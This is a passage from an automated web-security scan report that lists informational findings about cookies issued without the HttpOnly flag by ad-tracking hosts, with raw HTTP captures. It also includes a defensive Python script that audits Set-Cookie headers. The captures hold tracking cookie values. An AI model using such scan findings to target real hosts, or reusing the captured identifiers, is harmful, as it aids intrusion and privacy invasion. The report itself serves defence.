Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 53489
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:23 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.

pluckAppProxy.registerPlugin("pluck/pluck.js",
   // init function, called fir
...[SNIP]...

14.127. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sprint.tt.omtrdc.net
Path:   /m2/sprint/mbox/standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: mboxPC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:45:30 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 179
Date: Sun, 04 Sep 2011 00:45:30 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");
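
Findings 14.111 through 14.127 above all report the same condition: a Set-Cookie header issued without the HttpOnly attribute, with the reader left to judge whether the cookie carries anything worth stealing. The script below is an added example, not part of the original report and not the scanner's own logic. It pulls every Set-Cookie header out of a raw HTTP response, reports which cookies lack HttpOnly (and, for a response received over HTTPS, Secure), records the Domain scope, and applies a simple session-token heuristic based on name hints and value length/entropy. The two sample responses are constructed from the headers shown in findings 14.111 and 14.122 (cookie names usatprod and SiteLifeHost); the hardened ASP.NET_SessionId response, the name-hint list and the entropy threshold are assumptions of this example.

```python
"""Audit Set-Cookie headers in raw HTTP responses for missing HttpOnly/Secure flags.

Added example, not part of the original scan report. Sample responses are
constructed from findings 14.111 and 14.122; the session heuristic is an
assumption of this example, not the scanner's own logic.
"""
import math
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Assumption: substrings that usually mark a session/auth cookie name.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


@dataclass
class CookieReport:
    name: str
    value: str
    attributes: Dict[str, Optional[str]]          # lower-cased attribute -> value (None for flags)
    missing: List[str] = field(default_factory=list)
    looks_like_session: bool = False


def shannon_entropy(s: str) -> float:
    """Bits per character; long random tokens score high, short labels score low."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_set_cookie(header_value: str) -> CookieReport:
    """Split one Set-Cookie value into name, value and a case-insensitive attribute map."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, Optional[str]] = {}
    for part in parts[1:]:
        if not part:
            continue
        k, _, v = part.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else None   # flags like HttpOnly map to None
    return CookieReport(name=name.strip(), value=value.strip(), attributes=attrs)


def set_cookie_headers(raw_response: str) -> List[str]:
    """Return every Set-Cookie value from the response head (the part before the blank line)."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    values = []
    for line in re.split(r"\r?\n", head)[1:]:      # skip the status line
        k, sep, v = line.partition(":")
        if sep and k.strip().lower() == "set-cookie":
            values.append(v.strip())
    return values


def audit_response(raw_response: str, over_https: bool = False) -> List[CookieReport]:
    """Flag cookies lacking HttpOnly (and Secure on HTTPS); mark ones that look like session tokens."""
    reports = []
    for hv in set_cookie_headers(raw_response):
        rep = parse_set_cookie(hv)
        if "httponly" not in rep.attributes:
            rep.missing.append("HttpOnly")
        if over_https and "secure" not in rep.attributes:
            rep.missing.append("Secure")
        lname = rep.name.lower()
        # Heuristic (assumption): session-ish name, or a long value with high entropy.
        rep.looks_like_session = any(h in lname for h in SESSION_NAME_HINTS) or (
            len(rep.value) >= 16 and shannon_entropy(rep.value) > 3.5
        )
        reports.append(rep)
    return reports


def summarize(reports: List[CookieReport]) -> List[str]:
    """One human-readable line per cookie, in the spirit of the scanner's issue detail."""
    lines = []
    for r in reports:
        scope = r.attributes.get("domain") or "(host only)"
        lines.append(
            f"{r.name}: missing {', '.join(r.missing) or 'nothing'}; "
            f"domain={scope}; session-like={r.looks_like_session}"
        )
    return lines


# Constructed from finding 14.111 (single cookie, image response).
SAMPLE_GIF_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: usatprod=R1449690983; path=/\r\n"
    "Content-Length: 85\r\n"
    "Content-Type: image/gif\r\n"
    "\r\n"
    "GIF89a..."
)

# Constructed from finding 14.122 (two cookies, one scoped to the parent domain).
SAMPLE_TRACKER_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: usatprod=R1449690983; path=/\r\n"
    "Cache-Control: no-cache\r\n"
    "Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed counter-example (assumption): a hardened session cookie with no findings.
SAMPLE_HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: ASP.NET_SessionId=k3j5h2l7mnb9v8cx4zq1w0er; path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw, https in (("gif", SAMPLE_GIF_RESPONSE, False),
                              ("tracker", SAMPLE_TRACKER_RESPONSE, False),
                              ("hardened", SAMPLE_HARDENED_RESPONSE, True)):
        print(f"== {label} ==")
        for line in summarize(audit_response(raw, over_https=https)):
            print(line)
```

Run stand-alone, the script prints one line per cookie for each sample. The point the heuristic makes explicit is the one the report's wording implies: a missing HttpOnly flag matters in proportion to what the cookie holds, because HttpOnly is exactly what stops a reflected or stored XSS payload from reading the value through document.cookie. For usatprod that is informational, as the report says; SiteLifeHost deserves a second look only because its domain=usatoday.com scope means script on any usatoday.com host can read it.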

14.128. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif?&dcsdat=1315097075434&dcssip=www.reuters.com&dcsuri=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&dcsref=http://www.google.com/trends/hottrends%3Fq=notre%2Bdame%2Bfootball%26date=2011-9-3%26sa=X&WT.co_f=50.23.123.106-4086325760.30173190&WT.vtid=50.23.123.106-4086325760.30173190&WT.vtvs=1315097075506&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Notre%20Dame%20football%20stadium%20cleared%20due%20to%20lightning%20|%20Reuters&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1233x1037&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ssl=0&WT.es=www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&WT.cg_n=News%20-%20US&WT.cg_s=domesticNews&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&ChannelList=domesticNews;Honda;Inspiration;everything;treasuryMarkets;Deals;Shell;Amtrak;Amtrak2;yahoo3;VerizonMap;echoActivityStream;Hyundai;everythingButHugin;SprintNow;OutloudFeed;chsgrains;ciscoenterprise;CFA;samsung;asia&Comments=1&ModID=domesticNews|Text|13827288_Most%20Read%20Articles;domesticNews|Text|13827289_Most%20Shared%20Articles;domesticNews|Text|13827290_Most%20Discussed%20Articles;domesticNews|Text|13827291_Most%20Watched%20Videos;domesticNews|Text|13483695_Related%20Topics&ModImp=1&VBC=cfa&ContentType=Text&ContentID=USTRE78222D20110903&ContentChannel=domesticNews&ContentID_domesticNews=USTRE78222D20110903&ContentHeadline=Notre%2BDame%2Bfootball%2Bstadium%2Bcleared%2Bdue%2Bto%2Blightning&PageNumber=1&PageTotal=1&rChannel=News&rCountry=BETAUS&DartZone=us.reuters/news/us/article HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAHAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OAwAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 00:56:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAALLMYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAACyzGJOzcliTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 00:56:18 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.129. http://sync.adap.tv/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:31 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

14.130. http://sync.mathtag.com/sync/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img HTTP/1.1
Host: sync.mathtag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x2 pid 0x6804 26628
Set-Cookie: ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT
Date: Sun, 04 Sep 2011 01:24:27 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.131. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=17778&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:13 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:13 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:13 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:13 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100173|17778^1315097086^1315100173; path=/; expires=Sun, 04-Sep-11 01:36:13 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:13 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


14.132. http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/741/mcclatchy/728x90/sacramento_sacbee

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/741/mcclatchy/728x90/sacramento_sacbee?01AD=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw&01RI=5FB3F64412C0344&01NA=&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=14c82149-9fc3-4277-af4b-df6e89b3fc47; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1104
Content-Type: application/javascript
Date: Sun, 04 Sep 2011 01:01:17 GMT
Connection: close
Set-Cookie: D41U=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw; expires=Sun, 02-Oct-2011 01:01:17 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"


document.write("<div style='width:728px,height:90px;margin:0;border:0'>");


document.write(unescape('%3C%21--%20%20Rubicon%20Project%20Tag%20--%3E%0A%3C%21--%20%20Site%3A%20McClatchy%20%2
...[SNIP]...

14.133. http://tags.bluekai.com/site/2964

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2964

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2964?id=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/rubicon-cms2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9c2; bk=LSg6zMqbInUze1lp; bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:09 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ce11; expires=Tue, 06-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=VaDKuLV5c/cze1lp; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJ0qyLl9y1qO0YOTnLZwARsORx3xgtF/Q1vwRDcymqARswj1jt9yw/lQcths8qLNGwJOB/0FOLHt+HYIBJx4hGUve6UMQI0cXxsoJO+c; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4GJ7Qr0xX99Nx1IQ==; expires=Fri, 02-Mar-2012 01:02:09 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:02:09 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.134. http://tags.bluekai.com/site/38

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/38

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/38 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9bc; bk=JhN45MqbInUze1lp; bkc=KJhERtOQLv+kRBCp1LZwWzCV9I/ynkHIvOGdCQUOwyxANALh1axQX5KCXDc3RUyoxxSsFUh1eeq7ThOXUkuICOyeYCIAcXqdhLw9zamsiuaGeRJdyJWHCqXjM52FQLGdgRnv5IhAxmsef/whmDaI7Xf9AauvTO2LHrVfBSe0xEu1Fhg/lfyjkVd5iLGctjz/8x19/mavCy==; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:43:46 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62c9c2; expires=Tue, 06-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=LSg6zMqbInUze1lp; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhERtOQLv+kRBCp1LZwYzCV9I/ynkHIvOGdCQUOwXE/ynOKiGsC9LC7CwnUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9YSHuGL=; expires=Fri, 02-Mar-2012 00:43:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:43:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 00:43:46 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.135. http://tags.bluekai.com/site/4449

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4449

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4449 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJ0E8VBQYaGE8X4Y/9kk1EW99YDs9b6=; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzZ6OKsu9xe3rHUE; bklc=4e62c9df; bk=aBD3cMqbInUze1lp; bkc=KJ0qyLl9y1qO0cedjJ/4/y1eyhxQU2Kx9RD4yTnQ3yshUu6eyhTQ7y7veIBY8RKiXDcbR4hexWwVupWyPWeB9dcUG4aObZaXvDWsCgNXE9yt8I1x4a8DFGxz9yG4oOdsdXqeycOECGACS9tY4XYHWRVdsRl4qTnvwbtY074LjWeCQI0eXEkO4odmyJODir94qWqkrpVQXAW6MnXS0BIXsjPFlRgvO2ZUYmDe9WY6PW9=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bkdc=sf

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62ca02; expires=Tue, 06-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=myAUzYJX+9Fze1lp; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; expires=Fri, 02-Mar-2012 00:44:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 00:44:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Location: http://segments.adap.tv/data/?p=datalogix&type=gif&segment=1,32838,33729&add=true&rnd=11785756489
